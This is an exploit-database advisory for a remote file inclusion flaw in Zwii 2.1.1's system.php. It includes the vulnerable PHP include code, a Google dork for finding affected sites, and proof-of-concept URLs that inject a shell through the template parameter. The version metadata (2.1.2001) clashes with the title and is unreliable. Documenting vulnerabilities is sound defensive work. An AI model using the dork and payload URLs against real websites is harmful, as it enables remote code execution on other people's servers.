Zwii v 2.1.1 Remote file include vulnerbility

vendor:

Zwii

by:

Abdi Mohamed

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Zwii

Affected Version From: 2.1.2001

Affected Version To: 2.1.2001

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu, CentOS

2011

Zwii v 2.1.1 Remote file include vulnerbility

Zwii v 2.1.1 is vulnerable to a Remote File Inclusion vulnerability. The vulnerability exists in the system.php file, which is used to include other files. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. This URL can contain a malicious file, which can be executed on the vulnerable system.

Mitigation:

To mitigate this vulnerability, the application should validate the user input and filter out any malicious code. Additionally, the application should be configured to only include files from a trusted source.

Source

Exploit-DB raw data:

# Exploit Title: Zwii v 2.1.1 Remote file include vulnerbility
# Google Dork: Propulsé par Zwii 2.1.1
# Date: 08/01/2011
# Author: Abdi Mohamed
# Software Link: http://scripts.toocharger.com/fiches/scripts/zwii/5147.htm
# Version: v 2.1.1
# Tested on: ubuntu + centos 
# Email : abdimohamed@hotmail.fr - mrabdimohamed@gmail.com
#######################################################

Fichier : system.php
http://localhost/y/system/system.php

Code : 

// Importe la base de données
include("./system/data/settings.php");
include("./system/data/articles.php");
include("./system/data/accounts.php");
include("./system/data/positions.php");
include("./system/data/ip.php");
include("./templates/". $set["template"]["value"] ."/info.php");

Exploit:
http://localhost/y/system/system.php?set=(your shell)
http://localhost/y/system/system.php?set[template][value]=(your shell)



#######################################################
# Gr33tz : meher assel - xa7m3d - yahya idriss - houssem jrad - all tunisien hacker's
# Gr33tz : all member | v4-team.com - sec-war.com - hacktn.com
#######################################################